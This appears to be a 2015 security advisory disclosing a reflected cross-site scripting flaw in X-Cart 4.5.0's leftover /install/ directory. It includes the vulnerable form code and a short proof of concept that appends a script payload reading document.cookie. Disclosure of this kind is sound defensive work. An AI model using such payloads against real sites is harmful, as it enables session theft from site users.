X-Cart 4.5.0 Cross Site Scripting

2015.07.01
Credit: nopesled
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: X-Cart Cross Site Scripting # Date: 30/06/2015 # Exploit Author: nopesled # Vendor Homepage: http://www.x-cart.com/ # Version: 4.5.0 and possibly earlier Details ------- Websites running X-Cart version 4.5.0 (and possibly below) which have not removed their /install/ directory are vulnerable to Cross Site Scripting via a GET request. The affected code is as follows: <form method="post" name="ifrm" action="/install.php/" onsubmit="javascript: return step_next();"> Proof of Concept ---------------- 1. Navigate to /install/ 2. Append javascript payload (Eg: <script>alert(document.cookie)</script> 3. Alert box appears containing cookie information 4. Analysis of page source reveals the following change <form method="post" name="ifrm" action="/install.php/"><script>alert(document.cookie)</script>" onsubmit="javascript: return step_next();"> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Signed. -----BEGIN PGP SIGNATURE----- Version: Keybase OpenPGP v2.0.14 Comment: https://keybase.io/crypto wsBcBAABCgAGBQJVkn9KAAoJEOB0UMODnV4UypMH+wfgkTiaFA5T5Ab4J7I89z9g o+6/uypHQwnYRfiAWKPXJVnGysgaBdvjzP8sLTozjQmGwDSTXimk5HiVXbLm9wt+ rLFS3X6+RldP/+E3J5ki2jQFM0cR+bVpEwPb5cusyfxVwFEidFoX5H5M37Go4+no 3K1xXCb+EzkmSuBaDtWDYD4nu/9RW2z0aoxpcrEomUefL8GQsYO37fOhorR4dqtO puXG8so+czyy2b+WUmwTy7WPqbiTtJDjehFdnyPSxy45xHmjeXBX+b9YoGbRZJ8i 6YXc8iIc5bOapyz4tCNrlqvaUO6yZurJ/6vQ4xSPyJuojQsUPUtqIKbq0wLg0sg= =cLt5 -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top